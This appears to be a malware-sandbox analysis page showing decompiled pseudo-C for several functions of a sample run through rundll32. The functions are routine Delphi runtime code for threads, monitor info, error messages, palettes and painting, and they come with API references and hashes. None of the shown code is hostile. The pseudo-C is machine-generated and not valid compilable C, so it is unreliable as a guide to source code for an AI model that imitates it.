Function 00E2CAB8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00E2CAB8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0xe7e314; // 0xe7f034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0xe7e130; // 0xe23cc8
					E00E1B9FC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00E13A00();
				}
				if(_t53 <= 0) {
					E00E2CA90();
				} else {
					E00E2CA9C(_t53);
				}
				_v16 = 0;
				_push(0xe7f870);
				L00E16368();
				_push(_t72);
				_push(0xe2cc46);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0xe7c404, _v16);
				_push(_t72);
				_push(0xe2cc27);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0xe2cc2e);
					return E00E13274(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E00E2707C(_v16, 0);
						E00E26F6C(_v16, 0);
						L00E164A8();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0xe2cbf1, _t72, 0xe7f870);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0xe2cbc2;
						 *[fs:eax] = _t67;
						_push(0xe2cbf8);
						_push(0xe7f870);
						L00E16368();
						return 0;
					} else {
						goto L14;
					}
				}
			}

0x00e2cab9
0x00e2cabb
0x00e2cabf
0x00e2cac0
0x00e2cac1
0x00e2cac3
0x00e2cac8
0x00e2cad0
0x00e2cad7
0x00e2cada
0x00e2cae4
0x00e2caf1
0x00e2caf6
0x00e2caf6
0x00e2cafd
0x00e2cb08
0x00e2caff
0x00e2cb01
0x00e2cb01
0x00e2cb0f
0x00e2cb12
0x00e2cb17
0x00e2cb1e
0x00e2cb1f
0x00e2cb24
0x00e2cb27
0x00e2cb38
0x00e2cb3d
0x00e2cb3e
0x00e2cb43
0x00e2cb46
0x00e2cb4d
0x00e2cb58
0x00e2cb5c
0x00e2cb5c
0x00e2cb5c
0x00e2cb5e
0x00e2cb65
0x00e2cc11
0x00e2cc13
0x00e2cc16
0x00e2cc19
0x00e2cc26
0x00e2cb6b
0x00e2cc0b
0x00e2cb7a
0x00e2cb82
0x00e2cb8c
0x00e2cb9c
0x00e2cbaa
0x00e2cbb5
0x00e2cbba
0x00e2cbbd
0x00e2cbdb
0x00e2cbde
0x00e2cbe1
0x00e2cbe6
0x00e2cbeb
0x00e2cbf0
0x00000000
0x00000000
0x00000000
0x00e2cc0b

APIs

GetCurrentThreadId.KERNEL32 ref: 00E2CAC3
GetCurrentThreadId.KERNEL32 ref: 00E2CAD2

Part of subcall function 00E2CA90: ResetEvent.KERNEL32(0000028C,00E2CB0D), ref: 00E2CA96

RtlEnterCriticalSection.KERNEL32(00E7F870), ref: 00E2CB17
InterlockedExchange.KERNEL32(00E7C404,?), ref: 00E2CB33
RtlLeaveCriticalSection.KERNEL32(00E7F870,00000000,00E2CC27,?,00000000,00E2CC46,?,00E7F870), ref: 00E2CB8C
RtlEnterCriticalSection.KERNEL32(00E7F870,00E2CBF8,00E2CC27,?,00000000,00E2CC46,?,00E7F870), ref: 00E2CBEB

Strings

LX, xrefs: 00E2CAEC

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID: LX
API String ID: 2189153385-564891587
Opcode ID: d96c8ada42079490955085f2dc8656a3d28aebe72b346e7342173ff5d714d4dc
Instruction ID: 197b2f070534ded75771781de0fe315bfeae50095fcf11c2b9850a72c78424aa
Opcode Fuzzy Hash: d96c8ada42079490955085f2dc8656a3d28aebe72b346e7342173ff5d714d4dc
Instruction Fuzzy Hash: B031F030A04744AFE711EFA4EC53AADBBE8EB49700FA2A8B4F414B3251D7759D40CA21

Uniqueness

Uniqueness Score: -1.00%

Function 00E372A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00E372A0(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0xe7f920 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00E16548();
						}
						_t24 = 1;
					}
				} else {
					 *0xe7f904 = E00E36F70(4, _t23,  *0xe7f904, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

0x00e372a9
0x00e372ac
0x00e372b6
0x00e372db
0x00e372e3
0x00e37303
0x00e37308
0x00e37313
0x00e3731e
0x00e37328
0x00e37329
0x00e3732a
0x00e3732b
0x00e3732c
0x00e3732d
0x00e37337
0x00e37339
0x00e37341
0x00e37342
0x00e37342
0x00e37347
0x00e37347
0x00e372b8
0x00e372ca
0x00e372d7
0x00e372d7
0x00e37351

APIs

GetMonitorInfoA.USER32(?,?), ref: 00E372D1
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00E372F8
GetSystemMetrics.USER32 ref: 00E3730D
GetSystemMetrics.USER32 ref: 00E37318
lstrcpy.KERNEL32(?,DISPLAY), ref: 00E37342

Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0

Strings

GetMonitorInfo, xrefs: 00E372B8
DISPLAY, xrefs: 00E37339

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 918fa6a9aea1fc8ac1e045ad4e1b466670ea6e909f8b434b4c620d6d1b432f7d
Instruction ID: 51f5843cb4bdc8a776e1e210df29a38c2781f10884f7e9db3235c0bef2ece59d
Opcode Fuzzy Hash: 918fa6a9aea1fc8ac1e045ad4e1b466670ea6e909f8b434b4c620d6d1b432f7d
Instruction Fuzzy Hash: 8211D3B1609306AFD734CF65AC48BA7BBE8EB45310F006529ED89F7250D770A884CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E37374 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00E37374(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0xe7f921 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00E16548();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0xe7f908; // 0xe37374
					 *0xe7f908 = E00E36F70(5, _t23, _t26, _t27, _t29);
					_t24 =  *0xe7f908(_t27, _t29);
				}
				return _t24;
			}

0x00e3737d
0x00e37380
0x00e3738a
0x00e373af
0x00e373b7
0x00e373d7
0x00e373dc
0x00e373e7
0x00e373f2
0x00e373fc
0x00e373fd
0x00e373fe
0x00e373ff
0x00e37400
0x00e37401
0x00e3740b
0x00e3740d
0x00e37415
0x00e37416
0x00e37416
0x00e3741b
0x00e3741b
0x00e3738c
0x00e37391
0x00e3739e
0x00e373ab
0x00e373ab
0x00e37425

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00E373CC
GetSystemMetrics.USER32 ref: 00E373E1
GetSystemMetrics.USER32 ref: 00E373EC
lstrcpy.KERNEL32(?,DISPLAY), ref: 00E37416

Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0

Strings

GetMonitorInfoA, xrefs: 00E3738C
DISPLAY, xrefs: 00E3740D
ts, xrefs: 00E37391, 00E3739E, 00E373A5

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA$ts
API String ID: 2545840971-451504685
Opcode ID: b69ee4ddc5f2f75ce828cd312c8d94512db6703b714724fead886f9cda04ce8b
Instruction ID: f62e6a1f7a9d3a08f5db114081d937a40f1d3117270833a2f6d4efa2b08da7f4
Opcode Fuzzy Hash: b69ee4ddc5f2f75ce828cd312c8d94512db6703b714724fead886f9cda04ce8b
Instruction Fuzzy Hash: 9C11DCB1605305AFD720DF61AC48BA7BFE9EB45310F005939EDA9B7250D270B884CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E37448 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00E37448(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0xe7f922 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00E16548();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0xe7f90c; // 0xe37448
					 *0xe7f90c = E00E36F70(6, _t23, _t26, _t27, _t29);
					_t24 =  *0xe7f90c(_t27, _t29);
				}
				return _t24;
			}

0x00e37451
0x00e37454
0x00e3745e
0x00e37483
0x00e3748b
0x00e374ab
0x00e374b0
0x00e374bb
0x00e374c6
0x00e374d0
0x00e374d1
0x00e374d2
0x00e374d3
0x00e374d4
0x00e374d5
0x00e374df
0x00e374e1
0x00e374e9
0x00e374ea
0x00e374ea
0x00e374ef
0x00e374ef
0x00e37460
0x00e37465
0x00e37472
0x00e3747f
0x00e3747f
0x00e374f9

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00E374A0
GetSystemMetrics.USER32 ref: 00E374B5
GetSystemMetrics.USER32 ref: 00E374C0
lstrcpy.KERNEL32(?,DISPLAY), ref: 00E374EA

Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0

Strings

Ht, xrefs: 00E37465, 00E37472, 00E37479
GetMonitorInfoW, xrefs: 00E37460
DISPLAY, xrefs: 00E374E1

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW$Ht
API String ID: 2545840971-3890327271
Opcode ID: f7956d5a20ec46cd0e5b25dd8c7c11a2d12ee1b5e260f75d7f2a278358251ebe
Instruction ID: f4b3a1de49011f92d3a65f466ea0835f7809318ae6ffe9bbc54043ea429d71c5
Opcode Fuzzy Hash: f7956d5a20ec46cd0e5b25dd8c7c11a2d12ee1b5e260f75d7f2a278358251ebe
Instruction Fuzzy Hash: ED11ACB1605315AFD720CF659C48BA7BFE9EF45711F00592AED99B7240D6B0B888CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E13EEC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E13EEC(void* __ecx) {
				long _v4;
				int _t3;

				if( *0xe7f04c == 0) {
					if( *0xe7c030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0xe7f220 == 0xd7b2 &&  *0xe7f228 > 0) {
						 *0xe7f238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00E13F74, 2,  &_v4, 0);
				}
			}

0x00e13ef4
0x00e13f54
0x00e13f64
0x00e13f64
0x00e13f6a
0x00e13ef6
0x00e13eff
0x00e13f0f
0x00e13f0f
0x00e13f2b
0x00e13f4c
0x00e13f4c

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?,00E7F638,?,?,`,00E161A1,00E7B459), ref: 00E13F25
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?,00E7F638,?,?,`,00E161A1,00E7B459), ref: 00E13F2B
GetStdHandle.KERNEL32(000000F5,00E13F74,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?,00E7F638), ref: 00E13F40
WriteFile.KERNEL32(00000000,000000F5,00E13F74,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?), ref: 00E13F46
MessageBoxA.USER32 ref: 00E13F64

Strings

Runtime error at 00000000, xrefs: 00E13F1E, 00E13F5D
Error, xrefs: 00E13F58

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 216035f248471bd1f135d7dd632a181cde9cb3acb31599840e0b30a9fd676216
Instruction ID: 3d09044c67a5886da1959682e58a59b9859179e5d4fcc55420d680f60b1e07d0
Opcode Fuzzy Hash: 216035f248471bd1f135d7dd632a181cde9cb3acb31599840e0b30a9fd676216
Instruction Fuzzy Hash: F0F09675B44380B8E620E760BC06FD921AC5748F28F24A259F228F50F387B045C5E662

Uniqueness

Uniqueness Score: -1.00%

Function 00E316B4 Relevance: 12.1, APIs: 8, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E316B4(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E00E128C8(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0xe317b1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(0xe317b8);
				return ReleaseDC(0, _v8);
			}

0x00e316b5
0x00e316be
0x00e316c7
0x00e316db
0x00e316e7
0x00e316ec
0x00e316ed
0x00e316f2
0x00e316f5
0x00e31703
0x00e31708
0x00e3171d
0x00e3172c
0x00e31793
0x00e3172e
0x00e31741
0x00e3175f
0x00e31773
0x00e31773
0x00e3172c
0x00e3179a
0x00e3179d
0x00e317a0
0x00e317b0

APIs

GetDC.USER32(00000000), ref: 00E316E2
GetDeviceCaps.GDI32(?,00000068), ref: 00E316FE
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00E3171D
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00E31741
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00E3175F
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00E31773
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00E31793
ReleaseDC.USER32 ref: 00E317AB

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: 5fe8085485f9a709313544c25bfe180ee8851212799ff6e0041233f913016e57
Instruction ID: fa41f0b8293c488f4e5ba6d6a632e6f05acdccd23f3339116442751b00624006
Opcode Fuzzy Hash: 5fe8085485f9a709313544c25bfe180ee8851212799ff6e0041233f913016e57
Instruction Fuzzy Hash: D8212CB5A40208AAEB10DBA4CD86FAE77FCEB09704F901595F704FA181D675AE84DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00E5AC94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00E5AC94(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v12; // 0xe4263e
				_t75 =  *( *_t3 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00E5CFE0(_v8),  &_v84);
				}
				_push(_t100);
				_push(0xe5adb4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00E2707C( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E00E5ADEC(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0xe5adbb);
				_t41 =  &_v12; // 0xe4263e
				_t55 =  *_t41;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00E5CFE0(_v8),  &_v84);
				}
				return _t55;
			}

0x00e5ac95
0x00e5ac97
0x00e5ac9d
0x00e5aca0
0x00e5aca3
0x00e5aca6
0x00e5acab
0x00e5acbf
0x00e5acbf
0x00e5acc3
0x00e5acc4
0x00e5acc9
0x00e5accc
0x00e5acd9
0x00e5acf3
0x00e5acf6
0x00e5ad09
0x00e5ad0c
0x00e5ad0e
0x00e5ad0f
0x00e5ad11
0x00e5ad1c
0x00e5ad25
0x00e5ad37
0x00000000
0x00e5ad39
0x00e5ad55
0x00e5ad5c
0x00000000
0x00000000
0x00e5ad5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5ad5e
0x00e5ad5e
0x00e5ad5f
0x00e5ad5f
0x00e5ad11
0x00e5ad62
0x00e5ad66
0x00e5ad6f
0x00e5ad6f
0x00e5ad7a
0x00e5acdb
0x00e5ace2
0x00e5ace2
0x00e5ad86
0x00e5ad8d
0x00e5ad90
0x00e5ad93
0x00e5ad98
0x00e5ad98
0x00e5ad9f
0x00000000
0x00e5adae
0x00e5adb3

APIs

BeginPaint.USER32(00000000,?), ref: 00E5ACBA
SaveDC.GDI32(?), ref: 00E5ACEE
ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00E5AD50
RestoreDC.GDI32(?,00E42617), ref: 00E5AD7A
EndPaint.USER32(00000000,?,00E5ADBB), ref: 00E5ADAE

Strings

>&, xrefs: 00E5ACA3, 00E5AD98

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID: >&
API String ID: 3808407030-693758915
Opcode ID: 386a9302a2956a87c2417e2ebd78154ada4b6580391098c73af7d40538050e5d
Instruction ID: da25ba74a76a650239f56dc3be0b8dfe8d266e551617743d9e788de9ce154e64
Opcode Fuzzy Hash: 386a9302a2956a87c2417e2ebd78154ada4b6580391098c73af7d40538050e5d
Instruction Fuzzy Hash: F9418270A002049FC714EF98C885FADB7F9EF4830AF1995B8E904A7266D731DD48CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E339C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00E339C8(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t78;
				void* _t81;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				_t84 = _t86;
				_t87 = _t86 + 0xffffffdc;
				_t81 = __edx;
				_t66 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00E12C80( &_v38, 0x16);
					_t68 =  *((intOrPtr*)(_t66 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t68 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_v18 = E00E31EBC( &_v38);
					_v16 = GetDC(0);
					_push(_t84);
					_push(0xe33b03);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
					_v8 = E00E126CC(_v12);
					_push(_t84);
					_push(0xe33ae3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00E310CC(_t68);
					}
					E00E2910C(_t81, 0x16,  &_v38);
					E00E2910C(_t81, _v12, _v8);
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(0xe33aea);
					return E00E126EC(_v8);
				}
			}

0x00e339c9
0x00e339cb
0x00e339d0
0x00e339d2
0x00e339d8
0x00e33b0f
0x00e339de
0x00e339e8
0x00e339ed
0x00e339f0
0x00e339f7
0x00e339fe
0x00e33a08
0x00e33a00
0x00e33a00
0x00e33a00
0x00e33a1f
0x00e33a36
0x00e33a42
0x00e33a4d
0x00e33a52
0x00e33a53
0x00e33a58
0x00e33a5b
0x00e33a71
0x00e33a7c
0x00e33a81
0x00e33a82
0x00e33a87
0x00e33a8a
0x00e33aa7
0x00e33aa9
0x00e33aa9
0x00e33ab8
0x00e33ac5
0x00e33acc
0x00e33acf
0x00e33ad2
0x00e33ae2
0x00e33ae2

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00E33A1A
MulDiv.KERNEL32(?,?,000009EC), ref: 00E33A31
GetDC.USER32(00000000), ref: 00E33A48
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,00E33B03,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00E33A6C
